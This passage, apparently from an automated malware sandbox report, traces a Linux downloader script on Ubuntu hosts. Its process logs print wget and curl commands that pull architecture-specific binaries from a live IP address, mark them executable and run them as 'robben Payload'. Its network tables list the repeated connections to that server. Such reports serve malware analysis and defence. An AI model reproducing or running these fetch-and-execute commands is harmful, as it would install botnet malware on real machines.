/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.49:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.48:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:57

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

95s

Max time network

387s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-C6yiE2 systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-C6yiE2 systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

92s

Max time network

590s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-timedated.service-sYHQTy systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

